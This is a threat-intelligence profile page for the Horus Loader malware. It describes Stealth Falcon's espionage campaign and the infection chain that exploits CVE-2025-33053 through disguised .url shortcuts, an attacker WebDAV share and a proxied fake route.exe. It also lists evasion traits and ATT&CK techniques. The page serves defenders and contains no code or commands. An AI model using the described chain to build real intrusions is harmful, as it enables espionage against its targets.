Skip to main content
Mallory
Back to malware
MalwareUsed by 1 actorExploits 1 CVE

Horus Loader

Horus Loader is a custom multi-stage Windows loader used in 2025 espionage activity attributed by Check Point Research to Stealth Falcon (aka FruityArmor). It was observed in an infection chain exploiting the Windows WebDAV remote code execution zero-day CVE-2025-33053. The attacks used phishing-delivered .url shortcut files disguised as PDF documents; the shortcut set its working directory to an attacker-controlled WebDAV server and launched the legitimate Windows utility iediagcmd.exe, which was then induced to execute an attacker-supplied fake route.exe from the remote share. That fake route.exe installed Horus Loader.

Based on the reporting, Horus Loader is designed to be flexible and evasive. It is described as using code virtualization, anti-analysis techniques, string encryption, and control-flow flattening to hinder detection and reverse engineering. Its role in the chain is to clean up traces from earlier stages, bypass basic detection mechanisms, present a decoy PDF document to reduce user suspicion, and discreetly deploy or execute the final payload, Horus Agent.

The associated campaign targeted high-value government and defense organizations, with reported targeting in Turkey, Qatar, Egypt, and Yemen, and Stealth Falcon is described as a long-running espionage actor focused on political and strategic entities in the Middle East and Africa. Horus Loader was specifically linked to delivery of Horus Agent, a custom C++ implant built for the Mythic C2 framework. High-confidence behavioral context includes execution via attacker-hosted WebDAV infrastructure, use in a multi-stage loader chain, decoy document delivery, and final-stage deployment of Horus Agent.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
EXPLOITED CVES

Vulnerabilities exploited

1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

1 CVES
CVE-2025-33053WebDAV / Internet Shortcut Files Remote Code Execution in Microsoft WindowsExploited in the wild

"...a multi-stage loader we called Horus Loader..."

via checkpoint blogblog.checkpoint.com
THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
Stealth Falcon

"This causes iediagcmd.exe to run the attacker's fake route.exe program from the remote server, which installs a custom multi-stage loader called 'Horus Loader.'"

via bleeping computerbleepingcomputer.com
MITRE ATT&CK

Techniques & procedures

9 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

2 techniques
T1566PhishingEvidence1
TacticInitial Access

The latest campaign from Stealth Falcon began with phishing emails. In one incident observed by Check Point, hackers targeted a Turkish defense organization...

T1566.001Spearphishing AttachmentEvidence2
TacticInitial Access

Check Point uncovered the campaign after a victim uploaded the phishing email attachment to VirusTotal in March. On running the file, Check Point found the malicious file began to harvest diagnostic data and redirected the infected devices' WebDAV path to an attacker-controlled server.

Execution

2 techniques
T1203Exploitation for Client ExecutionEvidence2
TacticExecution

Microsoft patched a zero-day vulnerability in its web application framework exploited by an Emirati threat group... The flaw, tracked as CVE-2025-33053, is a remote code execution vulnerability in... WebDAV.

T1204User ExecutionEvidence1
TacticExecution

"Once the shortcut file was activated, it kicked off the next phase of the attack"

Stealth

4 techniques
T1036MasqueradingEvidence1
TacticStealth

"a .url file disguised as a PDF document"

T1036.004Masquerade Task or ServiceEvidence1
TacticStealth

"Drop and open a decoy document to avoid suspicion"; "While the victim is occupied with viewing the decoy document"

T1070Indicator RemovalEvidence1
TacticStealth

On execution, it cleaned up previous utilities to evade detection and then deployed a decoy document and the final Horus Agent payload.

T1218System Binary Proxy ExecutionEvidence1
TacticStealth

"abusing legitimate Windows tools... They tricked a built-in Windows utility into executing a malicious program"

Command and Control

1 technique
T1105Ingress Tool TransferEvidence1
TacticCommand and Control

Once the connection was established, a malicious file named route.exe executed from the attacker's WebDAV server that deployed the Horus loader.

ACTIVITY FEED

Recent activity

4 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

4 SOURCESView more in app
huntio blogNews
Jun 12, 2025
Stealth Falcon’s Zero-Day Offensive, OilRig’s Supply Chain Escalation, and the Evolving Middle Eastern APT Landscape

Multi-stage loader used by Stealth Falcon, featuring code virtualization and anti-analysis techniques to evade detection and deliver payloads such as Horus Agent.

Read more
bleeping computerNews
Jun 11, 2025
Hackers exploited Windows WebDav zero-day to drop malware

Custom multi-stage loader installed via a WebDAV-based execution technique (abusing CVE-2025-33053) that drops the primary payload (Horus Agent).

Read more
the hacker newsNews
Jun 11, 2025
Microsoft Patches 67 Vulnerabilities Including WEBDAV Zero-Day Exploited in the Wild

Loader component that displays a decoy PDF and executes the Horus Agent implant.

Read more
checkpoint blogNews
Jun 10, 2025
Inside Stealth Falcon’s Espionage Campaign Using a Microsoft Zero-Day - Check Point Blog

A multi-stage, evasive loader used to clean up infection artifacts, bypass basic detection, drop/open a decoy document, and discreetly deploy the final spyware/backdoor payload (Horus Agent).

Read more
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution1

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities1

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping9

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.